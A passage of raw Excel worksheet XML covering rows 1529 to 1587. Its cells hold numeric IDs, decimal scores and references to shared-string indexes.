      </c>
      <c r="B1529">
        <v>5239</v>
      </c>
      <c r="C1529">
        <v>5239</v>
      </c>
      <c r="D1529">
        <v>0</v>
      </c>
      <c r="E1529">
        <v>0.99299997091293335</v>
      </c>
      <c r="F1529" t="s">
        <v>7</v>
      </c>
      <c r="G1529" t="s">
        <v>3018</v>
      </c>
      <c r="H1529" t="s">
        <v>3019</v>
      </c>
    </row>
    <row r="1530" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1530" s="1">
        <v>1528</v>
      </c>
      <c r="B1530">
        <v>251</v>
      </c>
      <c r="C1530">
        <v>251</v>
      </c>
      <c r="D1530">
        <v>0</v>
      </c>
      <c r="E1530">
        <v>0.71200001239776611</v>
      </c>
      <c r="F1530" t="s">
        <v>7</v>
      </c>
      <c r="G1530" t="s">
        <v>3020</v>
      </c>
      <c r="H1530" t="s">
        <v>3021</v>
      </c>
    </row>
    <row r="1531" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1531" s="1">
        <v>1529</v>
      </c>
      <c r="B1531">
        <v>641</v>
      </c>
      <c r="C1531">
        <v>641</v>
      </c>
      <c r="D1531">
        <v>0</v>
      </c>
      <c r="E1531">
        <v>0.98619997501373291</v>
      </c>
      <c r="F1531" t="s">
        <v>7</v>
      </c>
      <c r="G1531" t="s">
        <v>3022</v>
      </c>
      <c r="H1531" t="s">
        <v>3023</v>
      </c>
    </row>
    <row r="1532" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1532" s="1">
        <v>1530</v>
      </c>
      <c r="B1532">
        <v>7568</v>
      </c>
      <c r="C1532">
        <v>7568</v>
      </c>
      <c r="D1532">
        <v>0</v>
      </c>
      <c r="E1532">
        <v>0.5250999927520752</v>
      </c>
      <c r="F1532" t="s">
        <v>7</v>
      </c>
      <c r="G1532" t="s">
        <v>3024</v>
      </c>
      <c r="H1532" t="s">
        <v>3025</v>
      </c>
    </row>
    <row r="1533" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1533" s="1">
        <v>1531</v>
      </c>
      <c r="B1533">
        <v>5178</v>
      </c>
      <c r="C1533">
        <v>5178</v>
      </c>
      <c r="D1533">
        <v>0</v>
      </c>
      <c r="E1533">
        <v>0.71340000629425049</v>
      </c>
      <c r="F1533" t="s">
        <v>7</v>
      </c>
      <c r="G1533" t="s">
        <v>3026</v>
      </c>
      <c r="H1533" t="s">
        <v>3027</v>
      </c>
    </row>
    <row r="1534" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1534" s="1">
        <v>1532</v>
      </c>
      <c r="B1534">
        <v>5636</v>
      </c>
      <c r="C1534">
        <v>5636</v>
      </c>
      <c r="D1534">
        <v>0</v>
      </c>
      <c r="E1534">
        <v>0.90600001811981201</v>
      </c>
      <c r="F1534" t="s">
        <v>7</v>
      </c>
      <c r="G1534" t="s">
        <v>3028</v>
      </c>
      <c r="H1534" t="s">
        <v>3029</v>
      </c>
    </row>
    <row r="1535" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1535" s="1">
        <v>1533</v>
      </c>
      <c r="B1535">
        <v>762</v>
      </c>
      <c r="C1535">
        <v>762</v>
      </c>
      <c r="D1535">
        <v>0</v>
      </c>
      <c r="E1535">
        <v>0.95800000429153442</v>
      </c>
      <c r="F1535" t="s">
        <v>7</v>
      </c>
      <c r="G1535" t="s">
        <v>3030</v>
      </c>
      <c r="H1535" t="s">
        <v>3031</v>
      </c>
    </row>
    <row r="1536" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1536" s="1">
        <v>1534</v>
      </c>
      <c r="B1536">
        <v>5181</v>
      </c>
      <c r="C1536">
        <v>5181</v>
      </c>
      <c r="D1536">
        <v>0</v>
      </c>
      <c r="E1536">
        <v>0.83090001344680786</v>
      </c>
      <c r="F1536" t="s">
        <v>7</v>
      </c>
      <c r="G1536" t="s">
        <v>3032</v>
      </c>
      <c r="H1536" t="s">
        <v>3033</v>
      </c>
    </row>
    <row r="1537" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1537" s="1">
        <v>1535</v>
      </c>
      <c r="B1537">
        <v>5444</v>
      </c>
      <c r="C1537">
        <v>5444</v>
      </c>
      <c r="D1537">
        <v>0</v>
      </c>
      <c r="E1537">
        <v>0.71840000152587891</v>
      </c>
      <c r="F1537" t="s">
        <v>7</v>
      </c>
      <c r="G1537" t="s">
        <v>3034</v>
      </c>
      <c r="H1537" t="s">
        <v>3035</v>
      </c>
    </row>
    <row r="1538" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1538" s="1">
        <v>1536</v>
      </c>
      <c r="B1538">
        <v>760</v>
      </c>
      <c r="C1538">
        <v>760</v>
      </c>
      <c r="D1538">
        <v>0</v>
      </c>
      <c r="E1538">
        <v>0.99519997835159302</v>
      </c>
      <c r="F1538" t="s">
        <v>7</v>
      </c>
      <c r="G1538" t="s">
        <v>3036</v>
      </c>
      <c r="H1538" t="s">
        <v>3037</v>
      </c>
    </row>
    <row r="1539" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1539" s="1">
        <v>1537</v>
      </c>
      <c r="B1539">
        <v>7573</v>
      </c>
      <c r="C1539">
        <v>7573</v>
      </c>
      <c r="D1539">
        <v>0</v>
      </c>
      <c r="E1539">
        <v>0.99790000915527344</v>
      </c>
      <c r="F1539" t="s">
        <v>7</v>
      </c>
      <c r="G1539" t="s">
        <v>3038</v>
      </c>
      <c r="H1539" t="s">
        <v>3039</v>
      </c>
    </row>
    <row r="1540" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1540" s="1">
        <v>1538</v>
      </c>
      <c r="B1540">
        <v>248</v>
      </c>
      <c r="C1540">
        <v>248</v>
      </c>
      <c r="D1540">
        <v>0</v>
      </c>
      <c r="E1540">
        <v>0.78799998760223389</v>
      </c>
      <c r="F1540" t="s">
        <v>7</v>
      </c>
      <c r="G1540" t="s">
        <v>3040</v>
      </c>
      <c r="H1540" t="s">
        <v>3041</v>
      </c>
    </row>
    <row r="1541" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1541" s="1">
        <v>1539</v>
      </c>
      <c r="B1541">
        <v>7574</v>
      </c>
      <c r="C1541">
        <v>7574</v>
      </c>
      <c r="D1541">
        <v>0</v>
      </c>
      <c r="E1541">
        <v>0.86400002241134644</v>
      </c>
      <c r="F1541" t="s">
        <v>7</v>
      </c>
      <c r="G1541" t="s">
        <v>3042</v>
      </c>
      <c r="H1541" t="s">
        <v>3043</v>
      </c>
    </row>
    <row r="1542" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1542" s="1">
        <v>1540</v>
      </c>
      <c r="B1542">
        <v>7575</v>
      </c>
      <c r="C1542">
        <v>7575</v>
      </c>
      <c r="D1542">
        <v>0</v>
      </c>
      <c r="E1542">
        <v>0.75040000677108765</v>
      </c>
      <c r="F1542" t="s">
        <v>7</v>
      </c>
      <c r="G1542" t="s">
        <v>3044</v>
      </c>
      <c r="H1542" t="s">
        <v>3045</v>
      </c>
    </row>
    <row r="1543" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1543" s="1">
        <v>1541</v>
      </c>
      <c r="B1543">
        <v>7576</v>
      </c>
      <c r="C1543">
        <v>7576</v>
      </c>
      <c r="D1543">
        <v>0</v>
      </c>
      <c r="E1543">
        <v>0.95469999313354492</v>
      </c>
      <c r="F1543" t="s">
        <v>7</v>
      </c>
      <c r="G1543" t="s">
        <v>3046</v>
      </c>
      <c r="H1543" t="s">
        <v>3047</v>
      </c>
    </row>
    <row r="1544" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1544" s="1">
        <v>1542</v>
      </c>
      <c r="B1544">
        <v>642</v>
      </c>
      <c r="C1544">
        <v>642</v>
      </c>
      <c r="D1544">
        <v>0</v>
      </c>
      <c r="E1544">
        <v>0.4731999933719635</v>
      </c>
      <c r="F1544" t="s">
        <v>7</v>
      </c>
      <c r="G1544" t="s">
        <v>3048</v>
      </c>
      <c r="H1544" t="s">
        <v>3049</v>
      </c>
    </row>
    <row r="1545" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1545" s="1">
        <v>1543</v>
      </c>
      <c r="B1545">
        <v>7577</v>
      </c>
      <c r="C1545">
        <v>7577</v>
      </c>
      <c r="D1545">
        <v>0</v>
      </c>
      <c r="E1545">
        <v>0.95359998941421509</v>
      </c>
      <c r="F1545" t="s">
        <v>7</v>
      </c>
      <c r="G1545" t="s">
        <v>3050</v>
      </c>
      <c r="H1545" t="s">
        <v>3051</v>
      </c>
    </row>
    <row r="1546" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1546" s="1">
        <v>1544</v>
      </c>
      <c r="B1546">
        <v>5620</v>
      </c>
      <c r="C1546">
        <v>5620</v>
      </c>
      <c r="D1546">
        <v>0</v>
      </c>
      <c r="E1546">
        <v>0.79589998722076416</v>
      </c>
      <c r="F1546" t="s">
        <v>7</v>
      </c>
      <c r="G1546" t="s">
        <v>3052</v>
      </c>
      <c r="H1546" t="s">
        <v>3053</v>
      </c>
    </row>
    <row r="1547" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1547" s="1">
        <v>1545</v>
      </c>
      <c r="B1547">
        <v>5238</v>
      </c>
      <c r="C1547">
        <v>5238</v>
      </c>
      <c r="D1547">
        <v>0</v>
      </c>
      <c r="E1547">
        <v>0.61640000343322754</v>
      </c>
      <c r="F1547" t="s">
        <v>7</v>
      </c>
      <c r="G1547" t="s">
        <v>3054</v>
      </c>
      <c r="H1547" t="s">
        <v>3055</v>
      </c>
    </row>
    <row r="1548" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1548" s="1">
        <v>1546</v>
      </c>
      <c r="B1548">
        <v>644</v>
      </c>
      <c r="C1548">
        <v>644</v>
      </c>
      <c r="D1548">
        <v>0</v>
      </c>
      <c r="E1548">
        <v>0.59670001268386841</v>
      </c>
      <c r="F1548" t="s">
        <v>7</v>
      </c>
      <c r="G1548" t="s">
        <v>3056</v>
      </c>
      <c r="H1548" t="s">
        <v>3057</v>
      </c>
    </row>
    <row r="1549" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1549" s="1">
        <v>1547</v>
      </c>
      <c r="B1549">
        <v>5182</v>
      </c>
      <c r="C1549">
        <v>5182</v>
      </c>
      <c r="D1549">
        <v>0</v>
      </c>
      <c r="E1549">
        <v>0.99279999732971191</v>
      </c>
      <c r="F1549" t="s">
        <v>7</v>
      </c>
      <c r="G1549" t="s">
        <v>3058</v>
      </c>
      <c r="H1549" t="s">
        <v>3059</v>
      </c>
    </row>
    <row r="1550" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1550" s="1">
        <v>1548</v>
      </c>
      <c r="B1550">
        <v>772</v>
      </c>
      <c r="C1550">
        <v>772</v>
      </c>
      <c r="D1550">
        <v>0</v>
      </c>
      <c r="E1550">
        <v>0.83689999580383301</v>
      </c>
      <c r="F1550" t="s">
        <v>7</v>
      </c>
      <c r="G1550" t="s">
        <v>3060</v>
      </c>
      <c r="H1550" t="s">
        <v>3061</v>
      </c>
    </row>
    <row r="1551" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1551" s="1">
        <v>1549</v>
      </c>
      <c r="B1551">
        <v>5624</v>
      </c>
      <c r="C1551">
        <v>5624</v>
      </c>
      <c r="D1551">
        <v>0</v>
      </c>
      <c r="E1551">
        <v>0.991100013256073</v>
      </c>
      <c r="F1551" t="s">
        <v>7</v>
      </c>
      <c r="G1551" t="s">
        <v>3062</v>
      </c>
      <c r="H1551" t="s">
        <v>3063</v>
      </c>
    </row>
    <row r="1552" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1552" s="1">
        <v>1550</v>
      </c>
      <c r="B1552">
        <v>7588</v>
      </c>
      <c r="C1552">
        <v>7588</v>
      </c>
      <c r="D1552">
        <v>0</v>
      </c>
      <c r="E1552">
        <v>0.67019999027252197</v>
      </c>
      <c r="F1552" t="s">
        <v>7</v>
      </c>
      <c r="G1552" t="s">
        <v>3064</v>
      </c>
      <c r="H1552" t="s">
        <v>3065</v>
      </c>
    </row>
    <row r="1553" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1553" s="1">
        <v>1551</v>
      </c>
      <c r="B1553">
        <v>7601</v>
      </c>
      <c r="C1553">
        <v>7601</v>
      </c>
      <c r="D1553">
        <v>0</v>
      </c>
      <c r="E1553">
        <v>0.41600000858306879</v>
      </c>
      <c r="F1553" t="s">
        <v>7</v>
      </c>
      <c r="G1553" t="s">
        <v>3066</v>
      </c>
      <c r="H1553" t="s">
        <v>3067</v>
      </c>
    </row>
    <row r="1554" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1554" s="1">
        <v>1552</v>
      </c>
      <c r="B1554">
        <v>7602</v>
      </c>
      <c r="C1554">
        <v>7602</v>
      </c>
      <c r="D1554">
        <v>0</v>
      </c>
      <c r="E1554">
        <v>0.73760002851486206</v>
      </c>
      <c r="F1554" t="s">
        <v>7</v>
      </c>
      <c r="G1554" t="s">
        <v>3068</v>
      </c>
      <c r="H1554" t="s">
        <v>3069</v>
      </c>
    </row>
    <row r="1555" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1555" s="1">
        <v>1553</v>
      </c>
      <c r="B1555">
        <v>701</v>
      </c>
      <c r="C1555">
        <v>701</v>
      </c>
      <c r="D1555">
        <v>0</v>
      </c>
      <c r="E1555">
        <v>0.45120000839233398</v>
      </c>
      <c r="F1555" t="s">
        <v>7</v>
      </c>
      <c r="G1555" t="s">
        <v>3070</v>
      </c>
      <c r="H1555" t="s">
        <v>3071</v>
      </c>
    </row>
    <row r="1556" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1556" s="1">
        <v>1554</v>
      </c>
      <c r="B1556">
        <v>5220</v>
      </c>
      <c r="C1556">
        <v>5220</v>
      </c>
      <c r="D1556">
        <v>0</v>
      </c>
      <c r="E1556">
        <v>0.74900001287460327</v>
      </c>
      <c r="F1556" t="s">
        <v>7</v>
      </c>
      <c r="G1556" t="s">
        <v>3072</v>
      </c>
      <c r="H1556" t="s">
        <v>3073</v>
      </c>
    </row>
    <row r="1557" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1557" s="1">
        <v>1555</v>
      </c>
      <c r="B1557">
        <v>7603</v>
      </c>
      <c r="C1557">
        <v>7603</v>
      </c>
      <c r="D1557">
        <v>0</v>
      </c>
      <c r="E1557">
        <v>0.93839997053146362</v>
      </c>
      <c r="F1557" t="s">
        <v>7</v>
      </c>
      <c r="G1557" t="s">
        <v>3074</v>
      </c>
      <c r="H1557" t="s">
        <v>3075</v>
      </c>
    </row>
    <row r="1558" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1558" s="1">
        <v>1556</v>
      </c>
      <c r="B1558">
        <v>7604</v>
      </c>
      <c r="C1558">
        <v>7604</v>
      </c>
      <c r="D1558">
        <v>0</v>
      </c>
      <c r="E1558">
        <v>0.67809998989105225</v>
      </c>
      <c r="F1558" t="s">
        <v>7</v>
      </c>
      <c r="G1558" t="s">
        <v>3076</v>
      </c>
      <c r="H1558" t="s">
        <v>521</v>
      </c>
    </row>
    <row r="1559" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1559" s="1">
        <v>1557</v>
      </c>
      <c r="B1559">
        <v>680</v>
      </c>
      <c r="C1559">
        <v>680</v>
      </c>
      <c r="D1559">
        <v>0</v>
      </c>
      <c r="E1559">
        <v>0.56690001487731934</v>
      </c>
      <c r="F1559" t="s">
        <v>7</v>
      </c>
      <c r="G1559" t="s">
        <v>3077</v>
      </c>
      <c r="H1559" t="s">
        <v>3078</v>
      </c>
    </row>
    <row r="1560" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1560" s="1">
        <v>1558</v>
      </c>
      <c r="B1560">
        <v>7609</v>
      </c>
      <c r="C1560">
        <v>7609</v>
      </c>
      <c r="D1560">
        <v>0</v>
      </c>
      <c r="E1560">
        <v>0.65140002965927124</v>
      </c>
      <c r="F1560" t="s">
        <v>7</v>
      </c>
      <c r="G1560" t="s">
        <v>3079</v>
      </c>
      <c r="H1560" t="s">
        <v>3080</v>
      </c>
    </row>
    <row r="1561" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1561" s="1">
        <v>1559</v>
      </c>
      <c r="B1561">
        <v>5219</v>
      </c>
      <c r="C1561">
        <v>5219</v>
      </c>
      <c r="D1561">
        <v>0</v>
      </c>
      <c r="E1561">
        <v>0.68290001153945923</v>
      </c>
      <c r="F1561" t="s">
        <v>7</v>
      </c>
      <c r="G1561" t="s">
        <v>3081</v>
      </c>
      <c r="H1561" t="s">
        <v>3082</v>
      </c>
    </row>
    <row r="1562" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1562" s="1">
        <v>1560</v>
      </c>
      <c r="B1562">
        <v>223</v>
      </c>
      <c r="C1562">
        <v>223</v>
      </c>
      <c r="D1562">
        <v>0</v>
      </c>
      <c r="E1562">
        <v>0.43439999222755432</v>
      </c>
      <c r="F1562" t="s">
        <v>7</v>
      </c>
      <c r="G1562" t="s">
        <v>3083</v>
      </c>
      <c r="H1562" t="s">
        <v>3084</v>
      </c>
    </row>
    <row r="1563" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1563" s="1">
        <v>1561</v>
      </c>
      <c r="B1563">
        <v>229</v>
      </c>
      <c r="C1563">
        <v>229</v>
      </c>
      <c r="D1563">
        <v>0</v>
      </c>
      <c r="E1563">
        <v>0.50300002098083496</v>
      </c>
      <c r="F1563" t="s">
        <v>7</v>
      </c>
      <c r="G1563" t="s">
        <v>3085</v>
      </c>
      <c r="H1563" t="s">
        <v>3086</v>
      </c>
    </row>
    <row r="1564" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1564" s="1">
        <v>1562</v>
      </c>
      <c r="B1564">
        <v>5730</v>
      </c>
      <c r="C1564">
        <v>5730</v>
      </c>
      <c r="D1564">
        <v>0</v>
      </c>
      <c r="E1564">
        <v>0.63470000028610229</v>
      </c>
      <c r="F1564" t="s">
        <v>7</v>
      </c>
      <c r="G1564" t="s">
        <v>3087</v>
      </c>
      <c r="H1564" t="s">
        <v>3088</v>
      </c>
    </row>
    <row r="1565" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1565" s="1">
        <v>1563</v>
      </c>
      <c r="B1565">
        <v>224</v>
      </c>
      <c r="C1565">
        <v>224</v>
      </c>
      <c r="D1565">
        <v>0</v>
      </c>
      <c r="E1565">
        <v>0.64620000123977661</v>
      </c>
      <c r="F1565" t="s">
        <v>7</v>
      </c>
      <c r="G1565" t="s">
        <v>3089</v>
      </c>
      <c r="H1565" t="s">
        <v>3090</v>
      </c>
    </row>
    <row r="1566" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1566" s="1">
        <v>1564</v>
      </c>
      <c r="B1566">
        <v>7614</v>
      </c>
      <c r="C1566">
        <v>7614</v>
      </c>
      <c r="D1566">
        <v>0</v>
      </c>
      <c r="E1566">
        <v>0.54960000514984131</v>
      </c>
      <c r="F1566" t="s">
        <v>7</v>
      </c>
      <c r="G1566" t="s">
        <v>3091</v>
      </c>
      <c r="H1566" t="s">
        <v>3092</v>
      </c>
    </row>
    <row r="1567" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1567" s="1">
        <v>1565</v>
      </c>
      <c r="B1567">
        <v>7615</v>
      </c>
      <c r="C1567">
        <v>7615</v>
      </c>
      <c r="D1567">
        <v>0</v>
      </c>
      <c r="E1567">
        <v>0.57419997453689575</v>
      </c>
      <c r="F1567" t="s">
        <v>7</v>
      </c>
      <c r="G1567" t="s">
        <v>3093</v>
      </c>
      <c r="H1567" t="s">
        <v>3094</v>
      </c>
    </row>
    <row r="1568" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1568" s="1">
        <v>1566</v>
      </c>
      <c r="B1568">
        <v>7616</v>
      </c>
      <c r="C1568">
        <v>7616</v>
      </c>
      <c r="D1568">
        <v>0</v>
      </c>
      <c r="E1568">
        <v>0.4984000027179718</v>
      </c>
      <c r="F1568" t="s">
        <v>7</v>
      </c>
      <c r="G1568" t="s">
        <v>3095</v>
      </c>
      <c r="H1568" t="s">
        <v>3096</v>
      </c>
    </row>
    <row r="1569" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1569" s="1">
        <v>1567</v>
      </c>
      <c r="B1569">
        <v>7617</v>
      </c>
      <c r="C1569">
        <v>7617</v>
      </c>
      <c r="D1569">
        <v>0</v>
      </c>
      <c r="E1569">
        <v>0.60379999876022339</v>
      </c>
      <c r="F1569" t="s">
        <v>7</v>
      </c>
      <c r="G1569" t="s">
        <v>3097</v>
      </c>
      <c r="H1569" t="s">
        <v>3098</v>
      </c>
    </row>
    <row r="1570" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1570" s="1">
        <v>1568</v>
      </c>
      <c r="B1570">
        <v>7618</v>
      </c>
      <c r="C1570">
        <v>7618</v>
      </c>
      <c r="D1570">
        <v>0</v>
      </c>
      <c r="E1570">
        <v>0.993399977684021</v>
      </c>
      <c r="F1570" t="s">
        <v>7</v>
      </c>
      <c r="G1570" t="s">
        <v>3099</v>
      </c>
      <c r="H1570" t="s">
        <v>3100</v>
      </c>
    </row>
    <row r="1571" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1571" s="1">
        <v>1569</v>
      </c>
      <c r="B1571">
        <v>7620</v>
      </c>
      <c r="C1571">
        <v>7620</v>
      </c>
      <c r="D1571">
        <v>0</v>
      </c>
      <c r="E1571">
        <v>0.53380000591278076</v>
      </c>
      <c r="F1571" t="s">
        <v>7</v>
      </c>
      <c r="G1571" t="s">
        <v>3101</v>
      </c>
      <c r="H1571" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="1572" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1572" s="1">
        <v>1570</v>
      </c>
      <c r="B1572">
        <v>227</v>
      </c>
      <c r="C1572">
        <v>227</v>
      </c>
      <c r="D1572">
        <v>0</v>
      </c>
      <c r="E1572">
        <v>0.61119997501373291</v>
      </c>
      <c r="F1572" t="s">
        <v>7</v>
      </c>
      <c r="G1572" t="s">
        <v>3103</v>
      </c>
      <c r="H1572" t="s">
        <v>3104</v>
      </c>
    </row>
    <row r="1573" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1573" s="1">
        <v>1571</v>
      </c>
      <c r="B1573">
        <v>7621</v>
      </c>
      <c r="C1573">
        <v>7621</v>
      </c>
      <c r="D1573">
        <v>0</v>
      </c>
      <c r="E1573">
        <v>0.9944000244140625</v>
      </c>
      <c r="F1573" t="s">
        <v>7</v>
      </c>
      <c r="G1573" t="s">
        <v>3105</v>
      </c>
      <c r="H1573" t="s">
        <v>3106</v>
      </c>
    </row>
    <row r="1574" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1574" s="1">
        <v>1572</v>
      </c>
      <c r="B1574">
        <v>7600</v>
      </c>
      <c r="C1574">
        <v>7600</v>
      </c>
      <c r="D1574">
        <v>0</v>
      </c>
      <c r="E1574">
        <v>0.98619997501373291</v>
      </c>
      <c r="F1574" t="s">
        <v>7</v>
      </c>
      <c r="G1574" t="s">
        <v>3107</v>
      </c>
      <c r="H1574" t="s">
        <v>3108</v>
      </c>
    </row>
    <row r="1575" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1575" s="1">
        <v>1573</v>
      </c>
      <c r="B1575">
        <v>232</v>
      </c>
      <c r="C1575">
        <v>232</v>
      </c>
      <c r="D1575">
        <v>0</v>
      </c>
      <c r="E1575">
        <v>0.51139998435974121</v>
      </c>
      <c r="F1575" t="s">
        <v>7</v>
      </c>
      <c r="G1575" t="s">
        <v>3109</v>
      </c>
      <c r="H1575" t="s">
        <v>3110</v>
      </c>
    </row>
    <row r="1576" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1576" s="1">
        <v>1574</v>
      </c>
      <c r="B1576">
        <v>7599</v>
      </c>
      <c r="C1576">
        <v>7599</v>
      </c>
      <c r="D1576">
        <v>0</v>
      </c>
      <c r="E1576">
        <v>0.98879998922348022</v>
      </c>
      <c r="F1576" t="s">
        <v>7</v>
      </c>
      <c r="G1576" t="s">
        <v>3111</v>
      </c>
      <c r="H1576" t="s">
        <v>3112</v>
      </c>
    </row>
    <row r="1577" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1577" s="1">
        <v>1575</v>
      </c>
      <c r="B1577">
        <v>221</v>
      </c>
      <c r="C1577">
        <v>221</v>
      </c>
      <c r="D1577">
        <v>0</v>
      </c>
      <c r="E1577">
        <v>0.98229998350143433</v>
      </c>
      <c r="F1577" t="s">
        <v>7</v>
      </c>
      <c r="G1577" t="s">
        <v>3113</v>
      </c>
      <c r="H1577" t="s">
        <v>3114</v>
      </c>
    </row>
    <row r="1578" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1578" s="1">
        <v>1576</v>
      </c>
      <c r="B1578">
        <v>729</v>
      </c>
      <c r="C1578">
        <v>729</v>
      </c>
      <c r="D1578">
        <v>0</v>
      </c>
      <c r="E1578">
        <v>0.53210002183914185</v>
      </c>
      <c r="F1578" t="s">
        <v>7</v>
      </c>
      <c r="G1578" t="s">
        <v>3115</v>
      </c>
      <c r="H1578" t="s">
        <v>3116</v>
      </c>
    </row>
    <row r="1579" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1579" s="1">
        <v>1577</v>
      </c>
      <c r="B1579">
        <v>5625</v>
      </c>
      <c r="C1579">
        <v>5625</v>
      </c>
      <c r="D1579">
        <v>0</v>
      </c>
      <c r="E1579">
        <v>0.99730002880096436</v>
      </c>
      <c r="F1579" t="s">
        <v>7</v>
      </c>
      <c r="G1579" t="s">
        <v>3117</v>
      </c>
      <c r="H1579" t="s">
        <v>3118</v>
      </c>
    </row>
    <row r="1580" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1580" s="1">
        <v>1578</v>
      </c>
      <c r="B1580">
        <v>5232</v>
      </c>
      <c r="C1580">
        <v>5232</v>
      </c>
      <c r="D1580">
        <v>0</v>
      </c>
      <c r="E1580">
        <v>0.99229997396469116</v>
      </c>
      <c r="F1580" t="s">
        <v>7</v>
      </c>
      <c r="G1580" t="s">
        <v>3119</v>
      </c>
      <c r="H1580" t="s">
        <v>3120</v>
      </c>
    </row>
    <row r="1581" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1581" s="1">
        <v>1579</v>
      </c>
      <c r="B1581">
        <v>5626</v>
      </c>
      <c r="C1581">
        <v>5626</v>
      </c>
      <c r="D1581">
        <v>0</v>
      </c>
      <c r="E1581">
        <v>0.53890001773834229</v>
      </c>
      <c r="F1581" t="s">
        <v>7</v>
      </c>
      <c r="G1581" t="s">
        <v>3121</v>
      </c>
      <c r="H1581" t="s">
        <v>3122</v>
      </c>
    </row>
    <row r="1582" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1582" s="1">
        <v>1580</v>
      </c>
      <c r="B1582">
        <v>7639</v>
      </c>
      <c r="C1582">
        <v>7639</v>
      </c>
      <c r="D1582">
        <v>0</v>
      </c>
      <c r="E1582">
        <v>0.95639997720718384</v>
      </c>
      <c r="F1582" t="s">
        <v>7</v>
      </c>
      <c r="G1582" t="s">
        <v>3123</v>
      </c>
      <c r="H1582" t="s">
        <v>3124</v>
      </c>
    </row>
    <row r="1583" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1583" s="1">
        <v>1581</v>
      </c>
      <c r="B1583">
        <v>239</v>
      </c>
      <c r="C1583">
        <v>239</v>
      </c>
      <c r="D1583">
        <v>0</v>
      </c>
      <c r="E1583">
        <v>0.48829999566078192</v>
      </c>
      <c r="F1583" t="s">
        <v>7</v>
      </c>
      <c r="G1583" t="s">
        <v>3125</v>
      </c>
      <c r="H1583" t="s">
        <v>3126</v>
      </c>
    </row>
    <row r="1584" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1584" s="1">
        <v>1582</v>
      </c>
      <c r="B1584">
        <v>7638</v>
      </c>
      <c r="C1584">
        <v>7638</v>
      </c>
      <c r="D1584">
        <v>0</v>
      </c>
      <c r="E1584">
        <v>0.99199998378753662</v>
      </c>
      <c r="F1584" t="s">
        <v>7</v>
      </c>
      <c r="G1584" t="s">
        <v>3127</v>
      </c>
      <c r="H1584" t="s">
        <v>3128</v>
      </c>
    </row>
    <row r="1585" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1585" s="1">
        <v>1583</v>
      </c>
      <c r="B1585">
        <v>5230</v>
      </c>
      <c r="C1585">
        <v>5230</v>
      </c>
      <c r="D1585">
        <v>0</v>
      </c>
      <c r="E1585">
        <v>0.99419999122619629</v>
      </c>
      <c r="F1585" t="s">
        <v>7</v>
      </c>
      <c r="G1585" t="s">
        <v>3129</v>
      </c>
      <c r="H1585" t="s">
        <v>3130</v>
      </c>
    </row>
    <row r="1586" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1586" s="1">
        <v>1584</v>
      </c>
      <c r="B1586">
        <v>7591</v>
      </c>
      <c r="C1586">
        <v>7591</v>
      </c>
      <c r="D1586">
        <v>0</v>
      </c>
      <c r="E1586">
        <v>0.98940002918243408</v>
      </c>
      <c r="F1586" t="s">
        <v>7</v>
      </c>
      <c r="G1586" t="s">
        <v>3131</v>
      </c>
      <c r="H1586" t="s">
        <v>3132</v>
      </c>
    </row>
    <row r="1587" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1587" s="1">
        <v>1585</v>
      </c>
      <c r="B1587">
        <v>7636</v>
      </c>
      <c r="C1587">
        <v>7636</v>
      </c>
      <c r="D1587">
        <v>0</v>
      </c>
      <c r="E1587">
        <v>0.69029998779296875</v>
      </c>
      <c r="F1587" t="s">
        <v>7</v>
      </c>
      <c r="G1587" t="s">
        <v>3133</v>
      </c>
      <c r="H1587" t="s">
        <v>3134</v>
